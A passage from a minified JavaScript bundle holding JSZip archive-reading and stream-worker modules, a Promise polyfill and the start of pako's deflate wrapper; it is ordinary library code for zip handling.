g.transformTo("string",this.readData(_))},readData:function(){},lastIndexOfSignature:function(){},readAndCheckSignature:function(){},readDate:function(){var _=this.readInt(4);return new Date(Date.UTC(1980+(_>>25&127),(_>>21&15)-1,_>>16&31,_>>11&31,_>>5&63,(31&_)<<1))}},Q.exports=b},9583:(Q,F,E)=>{"use strict";var g=E(414);function b(_){g.call(this,_)}E(8910).inherits(b,g),b.prototype.readData=function(_){this.checkOffset(_);var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},9226:(Q,F,E)=>{"use strict";var g=E(8542);function b(_){g.call(this,_)}E(8910).inherits(b,g),b.prototype.byteAt=function(_){return this.data.charCodeAt(this.zero+_)},b.prototype.lastIndexOfSignature=function(_){return this.data.lastIndexOf(_)-this.zero},b.prototype.readAndCheckSignature=function(_){return _===this.readData(4)},b.prototype.readData=function(_){this.checkOffset(_);var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},414:(Q,F,E)=>{"use strict";var g=E(2370);function b(_){g.call(this,_)}E(8910).inherits(b,g),b.prototype.readData=function(_){if(this.checkOffset(_),0===_)return new Uint8Array(0);var y=this.data.subarray(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},Q.exports=b},8435:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3790),_=E(2370),y=E(9226),M=E(9583),p=E(414);Q.exports=function(D){var w=g.getTypeOf(D);return g.checkSupport(w),"string"!==w||b.uint8array?"nodebuffer"===w?new M(D):b.uint8array?new p(g.transformTo("uint8array",D)):new _(g.transformTo("array",D)):new y(D)}},1141:(Q,F)=>{"use strict";F.LOCAL_FILE_HEADER="PK\x03\x04",F.CENTRAL_FILE_HEADER="PK\x01\x02",F.CENTRAL_DIRECTORY_END="PK\x05\x06",F.ZIP64_CENTRAL_DIRECTORY_LOCATOR="PK\x06\x07",F.ZIP64_CENTRAL_DIRECTORY_END="PK\x06\x06",F.DATA_DESCRIPTOR="PK\x07\b"},4293:(Q,F,E)=>{"use strict";var g=E(3718),b=E(8910);function _(y){g.call(this,"ConvertWorker to "+y),this.destType=y}b.inherits(_,g),_.prototype.processChunk=function(y){this.push({data:b.transformTo(this.destType,y.data),meta:y.meta})},Q.exports=_},2541:(Q,F,E)=>{"use strict";var g=E(3718),b=E(6988);function _(){g.call(this,"Crc32Probe"),this.withStreamInfo("crc32",0)}E(8910).inherits(_,g),_.prototype.processChunk=function(y){this.streamInfo.crc32=b(y.data,this.streamInfo.crc32||0),this.push(y)},Q.exports=_},5977:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718);function _(y){b.call(this,"DataLengthProbe for "+y),this.propName=y,this.withStreamInfo(y,0)}g.inherits(_,b),_.prototype.processChunk=function(y){y&&(this.streamInfo[this.propName]=(this.streamInfo[this.propName]||0)+y.data.length),b.prototype.processChunk.call(this,y)},Q.exports=_},5301:(Q,F,E)=>{"use strict";var g=E(8910),b=E(3718);function _(y){b.call(this,"DataWorker");var M=this;this.dataIsReady=!1,this.index=0,this.max=0,this.data=null,this.type="",this._tickScheduled=!1,y.then(function(p){M.dataIsReady=!0,M.data=p,M.max=p&&p.length||0,M.type=g.getTypeOf(p),M.isPaused||M._tickAndRepeat()},function(p){M.error(p)})}g.inherits(_,b),_.prototype.cleanUp=function(){b.prototype.cleanUp.call(this),this.data=null},_.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(!this._tickScheduled&&this.dataIsReady&&(this._tickScheduled=!0,g.delay(this._tickAndRepeat,[],this)),!0)},_.prototype._tickAndRepeat=function(){this._tickScheduled=!1,this.isPaused||this.isFinished||(this._tick(),this.isFinished||(g.delay(this._tickAndRepeat,[],this),this._tickScheduled=!0))},_.prototype._tick=function(){if(this.isPaused||this.isFinished)return!1;var y=null,M=Math.min(this.max,this.index+16384);if(this.index>=this.max)return this.end();switch(this.type){case"string":y=this.data.substring(this.index,M);break;case"uint8array":y=this.data.subarray(this.index,M);break;case"array":case"nodebuffer":y=this.data.slice(this.index,M)}return this.index=M,this.push({data:y,meta:{percent:this.max?this.index/this.max*100:0}})},Q.exports=_},3718:Q=>{"use strict";function F(E){this.name=E||"default",this.streamInfo={},this.generatedError=null,this.extraStreamInfo={},this.isPaused=!0,this.isFinished=!1,this.isLocked=!1,this._listeners={data:[],end:[],error:[]},this.previous=null}F.prototype={push:function(E){this.emit("data",E)},end:function(){if(this.isFinished)return!1;this.flush();try{this.emit("end"),this.cleanUp(),this.isFinished=!0}catch(E){this.emit("error",E)}return!0},error:function(E){return!this.isFinished&&(this.isPaused?this.generatedError=E:(this.isFinished=!0,this.emit("error",E),this.previous&&this.previous.error(E),this.cleanUp()),!0)},on:function(E,g){return this._listeners[E].push(g),this},cleanUp:function(){this.streamInfo=this.generatedError=this.extraStreamInfo=null,this._listeners=[]},emit:function(E,g){if(this._listeners[E])for(var b=0;b<this._listeners[E].length;b++)this._listeners[E][b].call(this,g)},pipe:function(E){return E.registerPrevious(this)},registerPrevious:function(E){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.streamInfo=E.streamInfo,this.mergeStreamInfo(),this.previous=E;var g=this;return E.on("data",function(b){g.processChunk(b)}),E.on("end",function(){g.end()}),E.on("error",function(b){g.error(b)}),this},pause:function(){return!this.isPaused&&!this.isFinished&&(this.isPaused=!0,this.previous&&this.previous.pause(),!0)},resume:function(){if(!this.isPaused||this.isFinished)return!1;this.isPaused=!1;var E=!1;return this.generatedError&&(this.error(this.generatedError),E=!0),this.previous&&this.previous.resume(),!E},flush:function(){},processChunk:function(E){this.push(E)},withStreamInfo:function(E,g){return this.extraStreamInfo[E]=g,this.mergeStreamInfo(),this},mergeStreamInfo:function(){for(var E in this.extraStreamInfo)Object.prototype.hasOwnProperty.call(this.extraStreamInfo,E)&&(this.streamInfo[E]=this.extraStreamInfo[E])},lock:function(){if(this.isLocked)throw new Error("The stream '"+this+"' has already been used.");this.isLocked=!0,this.previous&&this.previous.lock()},toString:function(){var E="Worker "+this.name;return this.previous?this.previous+" -> "+E:E}},Q.exports=F},1285:(Q,F,E)=>{"use strict";var g=E(8910),b=E(4293),_=E(3718),y=E(8458),M=E(3790),p=E(8565),D=null;if(M.nodestream)try{D=E(1220)}catch(x){}function w(x,S,O){var U=S;switch(S){case"blob":case"arraybuffer":U="uint8array";break;case"base64":U="string"}try{this._internalType=U,this._outputType=S,this._mimeType=O,g.checkSupport(U),this._worker=x.pipe(new b(U)),x.lock()}catch(K){this._worker=new _("error"),this._worker.error(K)}}w.prototype={accumulate:function(x){return S=this,O=x,new p.Promise(function(U,K){var ee=[],se=S._internalType,ve=S._outputType,le=S._mimeType;S.on("data",function(ye,z){ee.push(ye),O&&O(z)}).on("error",function(ye){ee=[],K(ye)}).on("end",function(){try{var ye=function(z,l,f){switch(z){case"blob":return g.newBlob(g.transformTo("arraybuffer",l),f);case"base64":return y.encode(l);default:return g.transformTo(z,l)}}(ve,function(z,l){var f,A=0,v=null,P=0;for(f=0;f<l.length;f++)P+=l[f].length;switch(z){case"string":return l.join("");case"array":return Array.prototype.concat.apply([],l);case"uint8array":for(v=new Uint8Array(P),f=0;f<l.length;f++)v.set(l[f],A),A+=l[f].length;return v;case"nodebuffer":return ie.concat(l);default:throw new Error("concat : unsupported type '"+z+"'")}}(se,ee),le);U(ye)}catch(z){K(z)}ee=[]}).resume()});var S,O},on:function(x,S){var O=this;return this._worker.on(x,"data"===x?function(U){S.call(O,U.data,U.meta)}:function(){g.delay(S,arguments,O)}),this},resume:function(){return g.delay(this._worker.resume,[],this._worker),this},pause:function(){return this._worker.pause(),this},toNodejsStream:function(x){if(g.checkSupport("nodestream"),"nodebuffer"!==this._outputType)throw new Error(this._outputType+" is not supported by this method");return new D(this,{objectMode:"nodebuffer"!==this._outputType},x)}},Q.exports=w},3790:(Q,F,E)=>{"use strict";if(F.base64=!0,F.array=!0,F.string=!0,F.arraybuffer="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array,F.nodebuffer=void 0!==ie,F.uint8array="undefined"!=typeof Uint8Array,"undefined"==typeof ArrayBuffer)F.blob=!1;else{var g=new ArrayBuffer(0);try{F.blob=0===new Blob([g],{type:"application/zip"}).size}catch(_){try{var b=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);b.append(g),F.blob=0===b.getBlob("application/zip").size}catch(y){F.blob=!1}}}try{F.nodestream=!!E(749).Readable}catch(_){F.nodestream=!1}},3600:(Q,F,E)=>{"use strict";for(var g=E(8910),b=E(3790),_=E(2182),y=E(3718),M=new Array(256),p=0;p<256;p++)M[p]=p>=252?6:p>=248?5:p>=240?4:p>=224?3:p>=192?2:1;function D(){y.call(this,"utf-8 decode"),this.leftOver=null}function w(){y.call(this,"utf-8 encode")}M[254]=M[254]=1,F.utf8encode=function(x){return b.nodebuffer?_.newBufferFrom(x,"utf-8"):function(S){var O,U,K,ee,se,ve=S.length,le=0;for(ee=0;ee<ve;ee++)55296==(64512&(U=S.charCodeAt(ee)))&&ee+1<ve&&56320==(64512&(K=S.charCodeAt(ee+1)))&&(U=65536+(U-55296<<10)+(K-56320),ee++),le+=U<128?1:U<2048?2:U<65536?3:4;for(O=b.uint8array?new Uint8Array(le):new Array(le),se=0,ee=0;se<le;ee++)55296==(64512&(U=S.charCodeAt(ee)))&&ee+1<ve&&56320==(64512&(K=S.charCodeAt(ee+1)))&&(U=65536+(U-55296<<10)+(K-56320),ee++),U<128?O[se++]=U:U<2048?(O[se++]=192|U>>>6,O[se++]=128|63&U):U<65536?(O[se++]=224|U>>>12,O[se++]=128|U>>>6&63,O[se++]=128|63&U):(O[se++]=240|U>>>18,O[se++]=128|U>>>12&63,O[se++]=128|U>>>6&63,O[se++]=128|63&U);return O}(x)},F.utf8decode=function(x){return b.nodebuffer?g.transformTo("nodebuffer",x).toString("utf-8"):function(S){var O,U,K,ee,se=S.length,ve=new Array(2*se);for(U=0,O=0;O<se;)if((K=S[O++])<128)ve[U++]=K;else if((ee=M[K])>4)ve[U++]=65533,O+=ee-1;else{for(K&=2===ee?31:3===ee?15:7;ee>1&&O<se;)K=K<<6|63&S[O++],ee--;ee>1?ve[U++]=65533:K<65536?ve[U++]=K:(ve[U++]=55296|(K-=65536)>>10&1023,ve[U++]=56320|1023&K)}return ve.length!==U&&(ve.subarray?ve=ve.subarray(0,U):ve.length=U),g.applyFromCharCode(ve)}(x=g.transformTo(b.uint8array?"uint8array":"array",x))},g.inherits(D,y),D.prototype.processChunk=function(x){var S=g.transformTo(b.uint8array?"uint8array":"array",x.data);if(this.leftOver&&this.leftOver.length){if(b.uint8array){var O=S;(S=new Uint8Array(O.length+this.leftOver.length)).set(this.leftOver,0),S.set(O,this.leftOver.length)}else S=this.leftOver.concat(S);this.leftOver=null}var U=function(ee,se){var ve;for((se=se||ee.length)>ee.length&&(se=ee.length),ve=se-1;ve>=0&&128==(192&ee[ve]);)ve--;return ve<0||0===ve?se:ve+M[ee[ve]]>se?ve:se}(S),K=S;U!==S.length&&(b.uint8array?(K=S.subarray(0,U),this.leftOver=S.subarray(U,S.length)):(K=S.slice(0,U),this.leftOver=S.slice(U,S.length))),this.push({data:F.utf8decode(K),meta:x.meta})},D.prototype.flush=function(){this.leftOver&&this.leftOver.length&&(this.push({data:F.utf8decode(this.leftOver),meta:{}}),this.leftOver=null)},F.Utf8DecodeWorker=D,g.inherits(w,y),w.prototype.processChunk=function(x){this.push({data:F.utf8encode(x.data),meta:x.meta})},F.Utf8EncodeWorker=w},8910:(Q,F,E)=>{"use strict";var g=E(3790),b=E(8458),_=E(2182),y=E(8565);function M(O){return O}function p(O,U){for(var K=0;K<O.length;++K)U[K]=255&O.charCodeAt(K);return U}E(4889),F.newBlob=function(O,U){F.checkSupport("blob");try{return new Blob([O],{type:U})}catch(ee){try{var K=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);return K.append(O),K.getBlob(U)}catch(se){throw new Error("Bug : can't construct the Blob.")}}};var D={stringifyByChunk:function(O,U,K){var ee=[],se=0,ve=O.length;if(ve<=K)return String.fromCharCode.apply(null,O);for(;se<ve;)ee.push(String.fromCharCode.apply(null,"array"===U||"nodebuffer"===U?O.slice(se,Math.min(se+K,ve)):O.subarray(se,Math.min(se+K,ve)))),se+=K;return ee.join("")},stringifyByChar:function(O){for(var U="",K=0;K<O.length;K++)U+=String.fromCharCode(O[K]);return U},applyCanBeUsed:{uint8array:function(){try{return g.uint8array&&1===String.fromCharCode.apply(null,new Uint8Array(1)).length}catch(O){return!1}}(),nodebuffer:function(){try{return g.nodebuffer&&1===String.fromCharCode.apply(null,_.allocBuffer(1)).length}catch(O){return!1}}()}};function w(O){var U=65536,K=F.getTypeOf(O),ee=!0;if("uint8array"===K?ee=D.applyCanBeUsed.uint8array:"nodebuffer"===K&&(ee=D.applyCanBeUsed.nodebuffer),ee)for(;U>1;)try{return D.stringifyByChunk(O,K,U)}catch(se){U=Math.floor(U/2)}return D.stringifyByChar(O)}function x(O,U){for(var K=0;K<O.length;K++)U[K]=O[K];return U}F.applyFromCharCode=w;var S={};S.string={string:M,array:function(O){return p(O,new Array(O.length))},arraybuffer:function(O){return S.string.uint8array(O).buffer},uint8array:function(O){return p(O,new Uint8Array(O.length))},nodebuffer:function(O){return p(O,_.allocBuffer(O.length))}},S.array={string:w,array:M,arraybuffer:function(O){return new Uint8Array(O).buffer},uint8array:function(O){return new Uint8Array(O)},nodebuffer:function(O){return _.newBufferFrom(O)}},S.arraybuffer={string:function(O){return w(new Uint8Array(O))},array:function(O){return x(new Uint8Array(O),new Array(O.byteLength))},arraybuffer:M,uint8array:function(O){return new Uint8Array(O)},nodebuffer:function(O){return _.newBufferFrom(new Uint8Array(O))}},S.uint8array={string:w,array:function(O){return x(O,new Array(O.length))},arraybuffer:function(O){return O.buffer},uint8array:M,nodebuffer:function(O){return _.newBufferFrom(O)}},S.nodebuffer={string:w,array:function(O){return x(O,new Array(O.length))},arraybuffer:function(O){return S.nodebuffer.uint8array(O).buffer},uint8array:function(O){return x(O,new Uint8Array(O.length))},nodebuffer:M},F.transformTo=function(O,U){if(U||(U=""),!O)return U;F.checkSupport(O);var K=F.getTypeOf(U);return S[K][O](U)},F.resolve=function(O){for(var U=O.split("/"),K=[],ee=0;ee<U.length;ee++){var se=U[ee];"."===se||""===se&&0!==ee&&ee!==U.length-1||(".."===se?K.pop():K.push(se))}return K.join("/")},F.getTypeOf=function(O){return"string"==typeof O?"string":"[object Array]"===Object.prototype.toString.call(O)?"array":g.nodebuffer&&_.isBuffer(O)?"nodebuffer":g.uint8array&&O instanceof Uint8Array?"uint8array":g.arraybuffer&&O instanceof ArrayBuffer?"arraybuffer":void 0},F.checkSupport=function(O){if(!g[O.toLowerCase()])throw new Error(O+" is not supported by this platform")},F.MAX_VALUE_16BITS=65535,F.MAX_VALUE_32BITS=-1,F.pretty=function(O){var U,K,ee="";for(K=0;K<(O||"").length;K++)ee+="\\x"+((U=O.charCodeAt(K))<16?"0":"")+U.toString(16).toUpperCase();return ee},F.delay=function(O,U,K){setImmediate(function(){O.apply(K||null,U||[])})},F.inherits=function(O,U){var K=function(){};K.prototype=U.prototype,O.prototype=new K},F.extend=function(){var O,U,K={};for(O=0;O<arguments.length;O++)for(U in arguments[O])Object.prototype.hasOwnProperty.call(arguments[O],U)&&void 0===K[U]&&(K[U]=arguments[O][U]);return K},F.prepareContent=function(O,U,K,ee,se){return y.Promise.resolve(U).then(function(ve){return g.blob&&(ve instanceof Blob||-1!==["[object File]","[object Blob]"].indexOf(Object.prototype.toString.call(ve)))&&"undefined"!=typeof FileReader?new y.Promise(function(le,ye){var z=new FileReader;z.onload=function(l){le(l.target.result)},z.onerror=function(l){ye(l.target.error)},z.readAsArrayBuffer(ve)}):ve}).then(function(ve){var le,ye=F.getTypeOf(ve);return ye?("arraybuffer"===ye?ve=F.transformTo("uint8array",ve):"string"===ye&&(se?ve=b.decode(ve):K&&!0!==ee&&(ve=p(le=ve,g.uint8array?new Uint8Array(le.length):new Array(le.length)))),ve):y.Promise.reject(new Error("Can't read the data of '"+O+"'. Is it in a supported JavaScript type (String, Blob, ArrayBuffer, etc) ?"))})}},6624:(Q,F,E)=>{"use strict";var g=E(8435),b=E(8910),_=E(1141),y=E(9392),M=E(3790);function p(D){this.files=[],this.loadOptions=D}p.prototype={checkSignature:function(D){if(!this.reader.readAndCheckSignature(D)){this.reader.index-=4;var w=this.reader.readString(4);throw new Error("Corrupted zip or bug: unexpected signature ("+b.pretty(w)+", expected "+b.pretty(D)+")")}},isSignature:function(D,w){var x=this.reader.index;this.reader.setIndex(D);var S=this.reader.readString(4)===w;return this.reader.setIndex(x),S},readBlockEndOfCentral:function(){this.diskNumber=this.reader.readInt(2),this.diskWithCentralDirStart=this.reader.readInt(2),this.centralDirRecordsOnThisDisk=this.reader.readInt(2),this.centralDirRecords=this.reader.readInt(2),this.centralDirSize=this.reader.readInt(4),this.centralDirOffset=this.reader.readInt(4),this.zipCommentLength=this.reader.readInt(2);var D=this.reader.readData(this.zipCommentLength),x=b.transformTo(M.uint8array?"uint8array":"array",D);this.zipComment=this.loadOptions.decodeFileName(x)},readBlockZip64EndOfCentral:function(){this.zip64EndOfCentralSize=this.reader.readInt(8),this.reader.skip(4),this.diskNumber=this.reader.readInt(4),this.diskWithCentralDirStart=this.reader.readInt(4),this.centralDirRecordsOnThisDisk=this.reader.readInt(8),this.centralDirRecords=this.reader.readInt(8),this.centralDirSize=this.reader.readInt(8),this.centralDirOffset=this.reader.readInt(8),this.zip64ExtensibleData={};for(var D,w,x,S=this.zip64EndOfCentralSize-44;0<S;)D=this.reader.readInt(2),w=this.reader.readInt(4),x=this.reader.readData(w),this.zip64ExtensibleData[D]={id:D,length:w,value:x}},readBlockZip64EndOfCentralLocator:function(){if(this.diskWithZip64CentralDirStart=this.reader.readInt(4),this.relativeOffsetEndOfZip64CentralDir=this.reader.readInt(8),this.disksCount=this.reader.readInt(4),this.disksCount>1)throw new Error("Multi-volumes zip are not supported")},readLocalFiles:function(){var D,w;for(D=0;D<this.files.length;D++)this.reader.setIndex((w=this.files[D]).localHeaderOffset),this.checkSignature(_.LOCAL_FILE_HEADER),w.readLocalPart(this.reader),w.handleUTF8(),w.processAttributes()},readCentralDir:function(){var D;for(this.reader.setIndex(this.centralDirOffset);this.reader.readAndCheckSignature(_.CENTRAL_FILE_HEADER);)(D=new y({zip64:this.zip64},this.loadOptions)).readCentralPart(this.reader),this.files.push(D);if(this.centralDirRecords!==this.files.length&&0!==this.centralDirRecords&&0===this.files.length)throw new Error("Corrupted zip or bug: expected "+this.centralDirRecords+" records in central dir, got "+this.files.length)},readEndOfCentral:function(){var D=this.reader.lastIndexOfSignature(_.CENTRAL_DIRECTORY_END);if(D<0)throw this.isSignature(0,_.LOCAL_FILE_HEADER)?new Error("Corrupted zip: can't find end of central directory"):new Error("Can't find end of central directory : is this a zip file ? If it is, see https://stuk.github.io/jszip/documentation/howto/read_zip.html");this.reader.setIndex(D);var w=D;if(this.checkSignature(_.CENTRAL_DIRECTORY_END),this.readBlockEndOfCentral(),this.diskNumber===b.MAX_VALUE_16BITS||this.diskWithCentralDirStart===b.MAX_VALUE_16BITS||this.centralDirRecordsOnThisDisk===b.MAX_VALUE_16BITS||this.centralDirRecords===b.MAX_VALUE_16BITS||this.centralDirSize===b.MAX_VALUE_32BITS||this.centralDirOffset===b.MAX_VALUE_32BITS){if(this.zip64=!0,(D=this.reader.lastIndexOfSignature(_.ZIP64_CENTRAL_DIRECTORY_LOCATOR))<0)throw new Error("Corrupted zip: can't find the ZIP64 end of central directory locator");if(this.reader.setIndex(D),this.checkSignature(_.ZIP64_CENTRAL_DIRECTORY_LOCATOR),this.readBlockZip64EndOfCentralLocator(),!this.isSignature(this.relativeOffsetEndOfZip64CentralDir,_.ZIP64_CENTRAL_DIRECTORY_END)&&(this.relativeOffsetEndOfZip64CentralDir=this.reader.lastIndexOfSignature(_.ZIP64_CENTRAL_DIRECTORY_END),this.relativeOffsetEndOfZip64CentralDir<0))throw new Error("Corrupted zip: can't find the ZIP64 end of central directory");this.reader.setIndex(this.relativeOffsetEndOfZip64CentralDir),this.checkSignature(_.ZIP64_CENTRAL_DIRECTORY_END),this.readBlockZip64EndOfCentral()}var x=this.centralDirOffset+this.centralDirSize;this.zip64&&(x+=20,x+=12+this.zip64EndOfCentralSize);var S=w-x;if(S>0)this.isSignature(w,_.CENTRAL_FILE_HEADER)||(this.reader.zero=S);else if(S<0)throw new Error("Corrupted zip: missing "+Math.abs(S)+" bytes.")},prepareReader:function(D){this.reader=g(D)},load:function(D){this.prepareReader(D),this.readEndOfCentral(),this.readCentralDir(),this.readLocalFiles()}},Q.exports=p},9392:(Q,F,E)=>{"use strict";var g=E(8435),b=E(8910),_=E(7326),y=E(6988),M=E(3600),p=E(1678),D=E(3790);function w(x,S){this.options=x,this.loadOptions=S}w.prototype={isEncrypted:function(){return 1==(1&this.bitFlag)},useUTF8:function(){return 2048==(2048&this.bitFlag)},readLocalPart:function(x){var S,O;if(x.skip(22),this.fileNameLength=x.readInt(2),O=x.readInt(2),this.fileName=x.readData(this.fileNameLength),x.skip(O),-1===this.compressedSize||-1===this.uncompressedSize)throw new Error("Bug or corrupted zip : didn't get enough information from the central directory (compressedSize === -1 || uncompressedSize === -1)");if(null===(S=function(U){for(var K in p)if(Object.prototype.hasOwnProperty.call(p,K)&&p[K].magic===U)return p[K];return null}(this.compressionMethod)))throw new Error("Corrupted zip : compression "+b.pretty(this.compressionMethod)+" unknown (inner file : "+b.transformTo("string",this.fileName)+")");this.decompressed=new _(this.compressedSize,this.uncompressedSize,this.crc32,S,x.readData(this.compressedSize))},readCentralPart:function(x){this.versionMadeBy=x.readInt(2),x.skip(2),this.bitFlag=x.readInt(2),this.compressionMethod=x.readString(2),this.date=x.readDate(),this.crc32=x.readInt(4),this.compressedSize=x.readInt(4),this.uncompressedSize=x.readInt(4);var S=x.readInt(2);if(this.extraFieldsLength=x.readInt(2),this.fileCommentLength=x.readInt(2),this.diskNumberStart=x.readInt(2),this.internalFileAttributes=x.readInt(2),this.externalFileAttributes=x.readInt(4),this.localHeaderOffset=x.readInt(4),this.isEncrypted())throw new Error("Encrypted zip are not supported");x.skip(S),this.readExtraFields(x),this.parseZIP64ExtraField(x),this.fileComment=x.readData(this.fileCommentLength)},processAttributes:function(){this.unixPermissions=null,this.dosPermissions=null;var x=this.versionMadeBy>>8;this.dir=!!(16&this.externalFileAttributes),0===x&&(this.dosPermissions=63&this.externalFileAttributes),3===x&&(this.unixPermissions=this.externalFileAttributes>>16&65535),this.dir||"/"!==this.fileNameStr.slice(-1)||(this.dir=!0)},parseZIP64ExtraField:function(){if(this.extraFields[1]){var x=g(this.extraFields[1].value);this.uncompressedSize===b.MAX_VALUE_32BITS&&(this.uncompressedSize=x.readInt(8)),this.compressedSize===b.MAX_VALUE_32BITS&&(this.compressedSize=x.readInt(8)),this.localHeaderOffset===b.MAX_VALUE_32BITS&&(this.localHeaderOffset=x.readInt(8)),this.diskNumberStart===b.MAX_VALUE_32BITS&&(this.diskNumberStart=x.readInt(4))}},readExtraFields:function(x){var S,O,U,K=x.index+this.extraFieldsLength;for(this.extraFields||(this.extraFields={});x.index+4<K;)S=x.readInt(2),O=x.readInt(2),U=x.readData(O),this.extraFields[S]={id:S,length:O,value:U};x.setIndex(K)},handleUTF8:function(){var x=D.uint8array?"uint8array":"array";if(this.useUTF8())this.fileNameStr=M.utf8decode(this.fileName),this.fileCommentStr=M.utf8decode(this.fileComment);else{var S=this.findExtraFieldUnicodePath();if(null!==S)this.fileNameStr=S;else{var O=b.transformTo(x,this.fileName);this.fileNameStr=this.loadOptions.decodeFileName(O)}var U=this.findExtraFieldUnicodeComment();if(null!==U)this.fileCommentStr=U;else{var K=b.transformTo(x,this.fileComment);this.fileCommentStr=this.loadOptions.decodeFileName(K)}}},findExtraFieldUnicodePath:function(){var x=this.extraFields[28789];if(x){var S=g(x.value);return 1!==S.readInt(1)||y(this.fileName)!==S.readInt(4)?null:M.utf8decode(S.readData(x.length-5))}return null},findExtraFieldUnicodeComment:function(){var x=this.extraFields[25461];if(x){var S=g(x.value);return 1!==S.readInt(1)||y(this.fileComment)!==S.readInt(4)?null:M.utf8decode(S.readData(x.length-5))}return null}},Q.exports=w},6859:(Q,F,E)=>{"use strict";var g=E(1285),b=E(5301),_=E(3600),y=E(7326),M=E(3718),p=function(S,O,U){this.name=S,this.dir=U.dir,this.date=U.date,this.comment=U.comment,this.unixPermissions=U.unixPermissions,this.dosPermissions=U.dosPermissions,this._data=O,this._dataBinary=U.binary,this.options={compression:U.compression,compressionOptions:U.compressionOptions}};p.prototype={internalStream:function(S){var O=null,U="string";try{if(!S)throw new Error("No output type specified.");var K="string"===(U=S.toLowerCase())||"text"===U;"binarystring"!==U&&"text"!==U||(U="string"),O=this._decompressWorker();var ee=!this._dataBinary;ee&&!K&&(O=O.pipe(new _.Utf8EncodeWorker)),!ee&&K&&(O=O.pipe(new _.Utf8DecodeWorker))}catch(se){(O=new M("error")).error(se)}return new g(O,U,"")},async:function(S,O){return this.internalStream(S).accumulate(O)},nodeStream:function(S,O){return this.internalStream(S||"nodebuffer").toNodejsStream(O)},_compressWorker:function(S,O){if(this._data instanceof y&&this._data.compression.magic===S.magic)return this._data.getCompressedWorker();var U=this._decompressWorker();return this._dataBinary||(U=U.pipe(new _.Utf8EncodeWorker)),y.createWorkerFrom(U,S,O)},_decompressWorker:function(){return this._data instanceof y?this._data.getContentWorker():this._data instanceof M?this._data:new b(this._data)}};for(var D=["asText","asBinary","asNodeBuffer","asUint8Array","asArrayBuffer"],w=function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},x=0;x<D.length;x++)p.prototype[D[x]]=w;Q.exports=p},3389:(Q,F,E)=>{"use strict";var g=E(5705);function b(){}var _={},y=["REJECTED"],M=["FULFILLED"],p=["PENDING"];function D(K){if("function"!=typeof K)throw new TypeError("resolver must be a function");this.state=p,this.queue=[],this.outcome=void 0,K!==b&&O(this,K)}function w(K,ee,se){this.promise=K,"function"==typeof ee&&(this.onFulfilled=ee,this.callFulfilled=this.otherCallFulfilled),"function"==typeof se&&(this.onRejected=se,this.callRejected=this.otherCallRejected)}function x(K,ee,se){g(function(){var ve;try{ve=ee(se)}catch(le){return _.reject(K,le)}ve===K?_.reject(K,new TypeError("Cannot resolve promise with itself")):_.resolve(K,ve)})}function S(K){var ee=K&&K.then;if(K&&("object"==typeof K||"function"==typeof K)&&"function"==typeof ee)return function(){ee.apply(K,arguments)}}function O(K,ee){var se=!1;function ve(z){se||(se=!0,_.reject(K,z))}function le(z){se||(se=!0,_.resolve(K,z))}var ye=U(function(){ee(le,ve)});"error"===ye.status&&ve(ye.value)}function U(K,ee){var se={};try{se.value=K(ee),se.status="success"}catch(ve){se.status="error",se.value=ve}return se}Q.exports=D,D.prototype.finally=function(K){if("function"!=typeof K)return this;var ee=this.constructor;return this.then(function(se){return ee.resolve(K()).then(function(){return se})},function(se){return ee.resolve(K()).then(function(){throw se})})},D.prototype.catch=function(K){return this.then(null,K)},D.prototype.then=function(K,ee){if("function"!=typeof K&&this.state===M||"function"!=typeof ee&&this.state===y)return this;var se=new this.constructor(b);return this.state!==p?x(se,this.state===M?K:ee,this.outcome):this.queue.push(new w(se,K,ee)),se},w.prototype.callFulfilled=function(K){_.resolve(this.promise,K)},w.prototype.otherCallFulfilled=function(K){x(this.promise,this.onFulfilled,K)},w.prototype.callRejected=function(K){_.reject(this.promise,K)},w.prototype.otherCallRejected=function(K){x(this.promise,this.onRejected,K)},_.resolve=function(K,ee){var se=U(S,ee);if("error"===se.status)return _.reject(K,se.value);var ve=se.value;if(ve)O(K,ve);else{K.state=M,K.outcome=ee;for(var le=-1,ye=K.queue.length;++le<ye;)K.queue[le].callFulfilled(ee)}return K},_.reject=function(K,ee){K.state=y,K.outcome=ee;for(var se=-1,ve=K.queue.length;++se<ve;)K.queue[se].callRejected(ee);return K},D.resolve=function(K){return K instanceof this?K:_.resolve(new this(b),K)},D.reject=function(K){var ee=new this(b);return _.reject(ee,K)},D.all=function(K){var ee=this;if("[object Array]"!==Object.prototype.toString.call(K))return this.reject(new TypeError("must be an array"));var se=K.length,ve=!1;if(!se)return this.resolve([]);for(var le=new Array(se),ye=0,z=-1,l=new this(b);++z<se;)f(K[z],z);return l;function f(A,v){ee.resolve(A).then(function(P){le[v]=P,++ye!==se||ve||(ve=!0,_.resolve(l,le))},function(P){ve||(ve=!0,_.reject(l,P))})}},D.race=function(K){if("[object Array]"!==Object.prototype.toString.call(K))return this.reject(new TypeError("must be an array"));var ee=K.length,se=!1;if(!ee)return this.resolve([]);for(var le=-1,ye=new this(b);++le<ee;)this.resolve(K[le]).then(function(z){se||(se=!0,_.resolve(ye,z))},function(z){se||(se=!0,_.reject(ye,z))});return ye}},9591:(Q,F,E)=>{"use strict";var g={};(0,E(4236).assign)(g,E(4555),E(8843),E(1619)),Q.exports=g},4555:(Q,F,E)=>{"use strict";var g=E(405),b=E(4236),_=E(9373),y=E(8898),M=E(2292),p=Object.prototype.toString;function D(x){if(!(this instanceof D))return new D(x);this.options=b.assign({level:-1,method:8,chunkSize:16384,windowBits:15,memLevel:8,strategy:0,to:""},x||{});var S=this.options;S.raw&&S.windowBits>0?S.windowBits=-S.windowBits:S.gzip&&S.windowBits>0&&S.windowBits<16&&(S.windowBits+=16),this.err=0,this.msg="",this.ended=!1,this.chunks=[],this.strm=new M,this.strm.avail_out=0;var O=g.deflateInit2(this.strm,S.level,S.method,S.windowBits,S.memLevel,S.strategy);if(0!==O)throw new 